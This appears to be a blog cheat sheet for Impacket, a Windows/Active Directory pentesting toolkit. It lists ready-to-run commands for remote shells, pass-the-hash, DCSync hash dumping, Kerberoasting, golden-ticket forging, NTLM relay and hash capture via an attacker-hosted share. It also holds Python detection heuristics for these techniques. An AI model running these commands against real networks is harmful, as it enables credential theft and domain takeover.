Impacket Tools Guide

Nov 20, 2024
3 min read
lawbyte

Impacket is a collection of Python classes for working with network protocols, focused on Windows and Active Directory. The example scripts shipped with it are staples of Windows pentesting.

Installation

pip install impacket
# or
git clone https://github.com/fortra/impacket && cd impacket && pip install .

# Verify
impacket-psexec --help

Authentication Formats

All Impacket tools accept multiple auth formats:

# Password
domain/user:password@target
user:password@target

# NTLM hash (Pass-the-Hash)
domain/user@target -hashes LM:NT
domain/user@target -hashes :NT_HASH # only NT hash needed

# Kerberos ticket
domain/user@target -k -no-pass
# (KRB5CCNAME must be set to the ticket file)

# AES key (Kerberos)
domain/user@target -aesKey AES128_OR_AES256_KEY -k
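The target spec above is split on a fixed pattern, and one consequence is worth knowing before a job fails mid-run: the password half ends at the first "@", so a password containing "@" is misread as part of the target. The following added example (my code, not part of Impacket or of this page) parses the spec and the -hashes value; the regex is written from memory of Impacket's example-script helper and is an assumption, as is the stricter hex check on the hash halves.

```python
import re

# Regex modelled on the one Impacket's example scripts use to split a
# "domain/user:password@target" spec (assumption: written from memory, not
# imported from Impacket, so verify against your installed version).
TARGET_RE = re.compile(r'(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)')

HEX32 = re.compile(r'^[0-9a-fA-F]{32}$')


def parse_target(spec):
    """Split a target spec into (domain, user, password, target).

    Missing parts come back as ''. Because the credential group ends at the
    first '@', a password may contain ':' but not '@': everything after the
    first '@' is taken as the target. Omit the password (domain/user@target)
    and let the tool prompt for it when it contains '@'.
    """
    domain, user, password, target = TARGET_RE.match(spec).groups('')
    return domain, user, password, target


def parse_hashes(hashes):
    """Split a -hashes LM:NT value into (lmhash, nthash).

    The tools split on ':' and accept an empty LM half (':NT_HASH'), since
    only the NT hash matters for NTLMv2. The 32-hex-character check is an
    addition here so a typo fails early instead of inside the auth exchange.
    """
    if ':' not in hashes:
        raise ValueError("expected LM:NT (use ':NT_HASH' when only the NT hash is known)")
    lmhash, nthash = hashes.split(':', 1)
    for half in (lmhash, nthash):
        if half and not HEX32.match(half):
            raise ValueError('hash half is not 32 hex characters: %r' % half)
    if not nthash:
        raise ValueError('NT hash is required')
    return lmhash.lower(), nthash.lower()


def describe(spec, hashes=None, kerberos=False):
    """Summarise which credential material a spec would use."""
    domain, user, password, target = parse_target(spec)
    if kerberos:
        mode = 'kerberos (ticket from KRB5CCNAME)'
    elif hashes is not None:
        mode = 'pass-the-hash nt=%s' % parse_hashes(hashes)[1]
    elif password:
        mode = 'password'
    else:
        mode = 'password (prompted)'
    return {'domain': domain, 'user': user, 'target': target, 'mode': mode}


if __name__ == '__main__':
    # Constructed sample specs in the formats listed above; the NT hash is the
    # well-known hash of an empty password, used only as a syntactically valid value.
    for spec, kw in [('domain/user:password@target', {}),
                     ('domain/user@target', {'hashes': ':31d6cfe0d16ae931b73c59d7e0c089c0'}),
                     ('domain/user@target', {'kerberos': True}),
                     ('domain/user:p@ss@target', {})]:
        print(spec, '->', describe(spec, **kw))
```

Running it shows the last spec parsed as password "p" and target "ss@target", which is the failure mode to expect when a password contains "@".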

Remote Execution Tools

psexec

Installs a service on the target and runs it. Leaves artifacts (a service install event and a dropped binary) but gives a SYSTEM shell:

impacket-psexec domain/Administrator:password@192.168.1.100
impacket-psexec domain/Administrator@192.168.1.100 -hashes :NT_HASH
impacket-psexec domain/Administrator@192.168.1.100 -k -no-pass

# Execute single command
impacket-psexec domain/user:pass@target "cmd.exe /c whoami"

wmiexec

Uses WMI — less noisy, no service created, runs as the authenticated user:

impacket-wmiexec domain/user:password@192.168.1.100
impacket-wmiexec domain/user@192.168.1.100 -hashes :NT_HASH

# Execute command
impacket-wmiexec domain/user:pass@target "whoami"

# Semi-interactive shell (default)
# No binary is dropped, but each command's output is written to a temp file on the ADMIN$ share and read back

smbexec

Creates a service for each command. Noisier than wmiexec:

impacket-smbexec domain/user:password@target
impacket-smbexec domain/user@target -hashes :NT_HASH

atexec

Executes via the Task Scheduler:

impacket-atexec domain/user:password@target whoami

dcomexec

Uses DCOM (Distributed COM) for execution:

impacket-dcomexec domain/user:password@target
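Each of the execution tools above leaves a different host-side trace: psexec and smbexec install a service (System event 7045), wmiexec spawns cmd.exe under the WMI provider host, and atexec registers a scheduled task (Security event 4698). The following added example (my code, not from Impacket or this page) runs a few such heuristics over constructed, flattened event records; the field names follow the Windows event data, the flat dict shape and the specific patterns (random letter-only names, output redirected to a share on 127.0.0.1) are assumptions tuned to the sample data.

```python
import re

# Heuristics (assumptions): service-based tools install a service whose name
# and binary are short runs of random letters; smbexec/wmiexec run cmd.exe
# with output redirected to a share on 127.0.0.1; atexec registers a
# root-level task with a random name.
RANDOM_LETTERS = re.compile(r'^[A-Za-z]{4,8}$')
SYSROOT_RANDOM_EXE = re.compile(r'^%systemroot%\\[A-Za-z]{8}\.exe$', re.IGNORECASE)
LOOPBACK_SHARE = re.compile(r'\\\\127\.0\.0\.1\\(?:C\$|ADMIN\$)\\', re.IGNORECASE)
ROOT_RANDOM_TASK = re.compile(r'^\\[A-Za-z]{8}$')

# Constructed sample events, one flat dict per record (the shape is an
# assumption; a real pipeline would map EVTX/XML fields onto it).
SAMPLE_EVENTS = [
    {"id": 7045, "host": "FS01", "ServiceName": "uUBe",
     "ImagePath": "%systemroot%\\AbCdEfGh.exe", "AccountName": "LocalSystem"},
    {"id": 7045, "host": "FS01", "ServiceName": "BTOBTO",
     "ImagePath": "%COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>&1 "
                  "> %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat",
     "AccountName": "LocalSystem"},
    {"id": 4688, "host": "FS01", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1700000000.12 2>&1"},
    {"id": 4698, "host": "FS01", "TaskName": "\\QwErTyUi", "SubjectUserName": "jdoe"},
    # Benign noise: a product's own service install and a cmd launched from Explorer.
    {"id": 7045, "host": "WS02", "ServiceName": "Sense",
     "ImagePath": "\"C:\\Program Files\\Vendor\\agent.exe\"", "AccountName": "LocalSystem"},
    {"id": 4688, "host": "WS02", "ParentImage": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
]


def classify(event):
    """Return a technique label for a suspicious event, or None if it looks benign."""
    eid = event.get("id")
    if eid == 7045:  # System log: a service was installed
        path = event.get("ImagePath", "")
        if LOOPBACK_SHARE.search(path) and "%COMSPEC%" in path.upper():
            return "service runs cmd with loopback-share redirect (smbexec-style)"
        if RANDOM_LETTERS.match(event.get("ServiceName", "")) and SYSROOT_RANDOM_EXE.match(path):
            return "random service name and binary in %SystemRoot% (psexec-style)"
    elif eid == 4688:  # Security log: process creation (needs command-line auditing enabled)
        parent = event.get("ParentImage", "").lower()
        if parent.endswith("\\wmiprvse.exe") and LOOPBACK_SHARE.search(event.get("CommandLine", "")):
            return "WmiPrvSE.exe child redirects output to loopback share (wmiexec-style)"
    elif eid == 4698:  # Security log: scheduled task created
        if ROOT_RANDOM_TASK.match(event.get("TaskName", "")):
            return "root-level scheduled task with random name (atexec-style)"
    return None


def detect(events):
    """Run classify() over a batch and return (host, event id, label) findings."""
    findings = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append((ev["host"], ev["id"], label))
    return findings


if __name__ == '__main__':
    for host, eid, label in detect(SAMPLE_EVENTS):
        print(f"{host} event {eid}: {label}")
```

The 4688 rule only works when process command-line auditing is enabled (or with Sysmon event 1, which carries the same fields); without it the WMI lineage is invisible and the service and task events are the only signal left.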

Credential Dumping

secretsdump

Dumps SAM hashes, LSA secrets, NTDS.dit hashes and domain cached credentials:

# From remote (requires admin)
impacket-secretsdump domain/Administrator:password@DC_IP

# With hash
impacket-secretsdump domain/Administrator@DC_IP -hashes :NT_HASH

# DCSync (pulls all domain hashes)
impacket-secretsdump domain.local/Administrator:password@DC_IP -just-dc

# Local SAM/SYSTEM dump
impacket-secretsdump local -sam SAM -system SYSTEM -security SECURITY

# Get just NTDS hashes
impacket-secretsdump domain/Administrator:pass@DC -just-dc-ntlm

# Get specific user's hash via DCSync
impacket-secretsdump domain/Administrator:pass@DC -just-dc-user krbtgt
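The -just-dc variants above work by asking the DC to replicate, so the detectable trace is a Security event 4662 in which a principal exercises the DS-Replication-Get-Changes rights on the domain object. The following added example (my code, not from Impacket or this page) scans constructed 4662 records for those rights being used by anything other than a domain controller computer account or an allowlisted sync account. The right GUIDs are the standard Active Directory control-access-right identifiers; the flat record shape and the allowlist name are assumptions.

```python
from collections import defaultdict

# Standard AD control access rights a DCSync needs (well-known GUIDs, not page values).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"

# Site-specific allowlist of non-DC accounts that legitimately replicate
# (assumption; the name below is constructed). DC computer accounts are
# recognised by their trailing '$' instead of being listed.
REPLICATION_ALLOWLIST = {"msol_directorysync"}

# Constructed 4662 records, flattened to one dict each (shape is an assumption).
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "IpAddress": "10.0.0.11",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "MSOL_DirectorySync", "IpAddress": "10.0.0.20",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jdoe", "IpAddress": "10.0.0.50",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jdoe", "IpAddress": "10.0.0.50",
     "Properties": "{00000000-1111-2222-3333-444444444444}"},  # unrelated right, constructed GUID
    {"SubjectUserName": "svc_backup", "IpAddress": "10.0.0.60",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def dcsync_rights(properties):
    """Return the set of replication rights named in a 4662 Properties field."""
    text = properties.lower()
    found = set()
    for name, guid in (("get-changes", DS_REPLICATION_GET_CHANGES),
                       ("get-changes-all", DS_REPLICATION_GET_CHANGES_ALL),
                       ("get-changes-filtered", DS_REPLICATION_GET_CHANGES_FILTERED)):
        if guid in text:
            found.add(name)
    return found


def is_expected_replicator(subject):
    """DC computer accounts and allowlisted sync accounts replicate by design."""
    return subject.endswith("$") or subject.lower() in REPLICATION_ALLOWLIST


def detect_dcsync(events):
    """Return findings for replication rights exercised by unexpected principals.

    Severity is 'high' when Get-Changes-All is present (that is the right that
    lets secrets be pulled), otherwise 'medium'. One finding per (subject, IP).
    """
    seen = defaultdict(set)
    for ev in events:
        rights = dcsync_rights(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if is_expected_replicator(subject):
            continue
        seen[(subject, ev.get("IpAddress", "?"))] |= rights
    findings = []
    for (subject, ip), rights in sorted(seen.items()):
        severity = "high" if "get-changes-all" in rights else "medium"
        findings.append({"subject": subject, "ip": ip, "rights": sorted(rights), "severity": severity})
    return findings


if __name__ == '__main__':
    for f in detect_dcsync(SAMPLE_4662):
        print(f"{f['severity']}: {f['subject']} from {f['ip']} used {', '.join(f['rights'])}")
```

4662 is only emitted when "Audit Directory Service Access" is enabled and the domain object carries a matching SACL, and it is a high-volume event, so filter on the three GUIDs at collection time rather than in the SIEM.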

Kerberos Attacks

GetUserSPNs — Kerberoasting

# List SPNs
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP

# Request hashes
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request

# Save to file
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request -outputfile kerberoast.txt

# Crack
hashcat -a 0 -m 13100 kerberoast.txt rockyou.txt

GetNPUsers — AS-REP Roasting

# Test a list of usernames (no credentials needed; accounts without pre-auth return an AS-REP)
impacket-GetNPUsers domain.local/ -dc-ip DC_IP -no-pass -usersfile users.txt

# With valid credentials (query the domain for all accounts without pre-auth and request them)
impacket-GetNPUsers domain.local/user:password -dc-ip DC_IP -request

# Save output
impacket-GetNPUsers domain.local/ -dc-ip DC_IP -no-pass -usersfile users.txt -format hashcat -outputfile asreproast.txt

# Crack
hashcat -a 0 -m 18200 asreproast.txt rockyou.txt

Ticket Operations

ticketer — Golden/Silver Ticket

# Golden Ticket (needs krbtgt hash + domain SID)
impacket-ticketer -nthash KRBTGT_HASH \
-domain-sid S-1-5-21-XXXX \
-domain domain.local \
Administrator

# Use the ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass domain.local/Administrator@DC_FQDN

# Silver Ticket (service ticket)
impacket-ticketer -nthash SERVICE_HASH \
-domain-sid S-1-5-21-XXXX \
-domain domain.local \
-spn CIFS/server.domain.local \
Administrator
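The Kerberos sections above (GetUserSPNs, GetNPUsers and ticketer) all show up on the domain controller as 4768 (TGT) and 4769 (service ticket) events, with two tells: the roasting tools request RC4 (etype 0x17) because hashcat modes 13100 and 18200 crack that, and an AS-REP for an account with pre-auth disabled is logged with pre-auth type 0. A forged TGT has no 4768 at all, so a service ticket issued to a client that never requested a TGT is a useful (if noisy) heuristic. The following added example (my code, not from Impacket or this page) runs those three checks over constructed records; the flat record shape and the per-client threshold are assumptions.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # etype 23; the cracking-friendly type the roasting tools ask for


def _ip(event):
    """Strip the IPv4-mapped prefix DCs usually log (::ffff:10.0.0.5)."""
    return event.get("IpAddress", "").replace("::ffff:", "")


def _account(name):
    """Drop a @REALM suffix so 4768 and 4769 account names compare equal."""
    return name.split("@", 1)[0]


# Constructed 4768 (TGT) and 4769 (service ticket) records; flat shape is an assumption.
SAMPLE_KERB = [
    {"id": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.0.50",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"id": 4768, "TargetUserName": "jdoe", "IpAddress": "::ffff:10.0.0.50",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"id": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "svc_sql",
     "IpAddress": "::ffff:10.0.0.50", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"id": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "svc_web",
     "IpAddress": "::ffff:10.0.0.50", "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"id": 4769, "TargetUserName": "jdoe@DOMAIN.LOCAL", "ServiceName": "FS01$",
     "IpAddress": "::ffff:10.0.0.50", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"id": 4769, "TargetUserName": "Administrator@DOMAIN.LOCAL", "ServiceName": "DC01$",
     "IpAddress": "::ffff:10.0.0.99", "TicketEncryptionType": "0x12", "Status": "0x0"},
]


def asrep_roast_candidates(events):
    """Successful 4768s with pre-auth type 0: the account has pre-auth disabled,
    so the AS-REP could have been obtained without a password. Sorted (user, ip)."""
    hits = {(ev["TargetUserName"], _ip(ev)) for ev in events
            if ev.get("id") == 4768 and ev.get("Status") == "0x0" and ev.get("PreAuthType") == "0"}
    return sorted(hits)


def kerberoast_candidates(events, threshold=2):
    """Clients requesting RC4 service tickets for user (non-'$') accounts.
    Returns {ip: sorted service accounts} for clients at or above the threshold."""
    per_client = defaultdict(set)
    for ev in events:
        if ev.get("id") != 4769 or ev.get("Status") != "0x0":
            continue
        svc = ev.get("ServiceName", "")
        if ev.get("TicketEncryptionType") == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
            per_client[_ip(ev)].add(svc)
    return {ip: sorted(s) for ip, s in per_client.items() if len(s) >= threshold}


def tgs_without_tgt(events):
    """Forged-TGT heuristic: a service ticket was issued to a (user, client)
    pair that obtained no TGT in the window. Sorted (user, ip)."""
    tgt_holders = {(_account(ev["TargetUserName"]), _ip(ev)) for ev in events
                   if ev.get("id") == 4768 and ev.get("Status") == "0x0"}
    tgs_users = {(_account(ev["TargetUserName"]), _ip(ev)) for ev in events
                 if ev.get("id") == 4769 and ev.get("Status") == "0x0"}
    return sorted(tgs_users - tgt_holders)


if __name__ == '__main__':
    print("AS-REP roastable:", asrep_roast_candidates(SAMPLE_KERB))
    print("Kerberoast clients:", kerberoast_candidates(SAMPLE_KERB))
    print("TGS without TGT:", tgs_without_tgt(SAMPLE_KERB))
```

The third check needs 4768 events from every DC in the domain and a window longer than the TGT lifetime, otherwise a client whose TGT came from another DC or before the window is reported too; treat it as a lead for correlation, not an alert on its own. The RC4 check loses value once AES-only service accounts are the norm, which is also the cheapest way to blunt Kerberoasting.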

getPac — Get PAC (Privilege Attribute Certificate)

impacket-getPac domain.local/user:password -targetUser Administrator

Network Services

smbserver — Serve Files / Capture Hashes

# Share a folder (no auth)
impacket-smbserver share /path/to/files -smb2support

# With auth (capture Net-NTLMv2 hashes)
impacket-smbserver share /tmp -username attacker -password password -smb2support

# Use from Windows to trigger authentication
\\ATTACKER_IP\share

# Capture and crack
hashcat -a 0 -m 5600 netntlmv2_hashes.txt rockyou.txt

ntlmrelayx — NTLM Relay Attacks

# Relay to all discovered SMB targets
impacket-ntlmrelayx -tf targets.txt -smb2support

# Interactive SMB shell
impacket-ntlmrelayx -t smb://TARGET_IP -smb2support -i

# Execute command
impacket-ntlmrelayx -t smb://TARGET_IP -smb2support -c "powershell -enc BASE64_CMD"

# LDAP relay (default action dumps domain information; --delegate-access configures resource-based constrained delegation on the relayed machine account). Blocked by LDAP signing and channel binding
impacket-ntlmrelayx -t ldap://DC_IP --delegate-access

# HTTP → SMB
impacket-ntlmrelayx -t smb://TARGET -smb2support
# Then trigger auth: responder or other LLMNR/NBT-NS poisoning

dnschef — DNS Proxy

# Respond to DNS queries with attacker IP
impacket-dnschef --fakeip ATTACKER_IP --fakedomains target.com

LDAP Tools

GetADUsers

impacket-GetADUsers domain.local/user:password -dc-ip DC_IP -all
impacket-GetADUsers domain.local/user:password -dc-ip DC_IP | grep -i admin

ldapdomaindump

pip install ldapdomaindump
ldapdomaindump -u "domain\user" -p password DC_IP -o /tmp/ldap_dump/

SMB Enumeration

samrdump

impacket-samrdump domain/user:password@target

lookupsid — Enumerate SIDs

impacket-lookupsid domain/user:password@DC_IP
impacket-lookupsid domain/user:password@DC_IP 20 # only brute-force RIDs up to 20

Quick Reference Table

Tool          Purpose                        Auth needed
psexec        Remote shell (SYSTEM)          Admin
wmiexec       Remote shell (user context)    Admin
secretsdump   Dump hashes                    Admin
GetUserSPNs   Kerberoasting                  Any domain user
GetNPUsers    AS-REP roasting                None (or any user)
ticketer      Forge Kerberos tickets         krbtgt hash (golden)
ntlmrelayx    NTLM relay attacks             None (captures)
smbserver     Host files / capture hashes    None